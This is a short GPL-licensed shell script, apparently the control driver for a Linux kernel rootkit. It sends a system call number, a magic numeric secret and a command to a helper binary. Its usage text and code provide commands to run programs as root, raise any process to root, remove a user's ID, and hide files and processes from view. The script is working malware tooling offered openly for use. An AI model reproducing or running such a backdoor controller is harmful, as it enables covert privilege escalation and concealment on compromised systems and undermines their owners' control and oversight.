#!/bin/sh
# Copyright 2019 Bailey Defino
# <https://bdefino.github.io>

# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.

# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.

# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <https://www.gnu.org/licenses/>.

# simple driver script
# Usage: ./$0 CALL NUMERIC_SECRET [COMMAND [ULONG | 0xHEXULONG | @CARRAY ...]]
# CALL
#   system call number
# COMMAND
#   module command to execute
#     command -> execute the arguments as root
#     elevate PID -> set a process's EUID to root
#     fugitive UID -> remove a user's ID 
#     hide PATH -> hide an entity ("/proc" paths are treated as processes)
#     show PATH -> show a hidden entity ("/proc" paths are treated as processes)
[ -z "$1" ] && echo "Expected a system call number." >&2 && exit 1
CALL="$1" # 102 is a good value for x86_64 Linux
COMMAND=system # execute a system command

if [ ! -z "$3" ]
then
  COMMAND="$3"
fi
[ -z "$2" ] && echo "Expected a numeric secret." >&2 && exit 1
NUMERIC_SECRET="$2" # 0xDEADBEF0 (~0xDEADBEEF) is a good value
REST_LEN=`echo -n "${CALL} ${NUMERIC_SECRET} ${COMMAND}" | wc -c`
REST=`echo -n "$@" | cut "-c$(( ${REST_LEN} + 1 ))-"`
./syscall "${CALL}" "@${NUMERIC_SECRET}" "@${COMMAND}" ${REST}

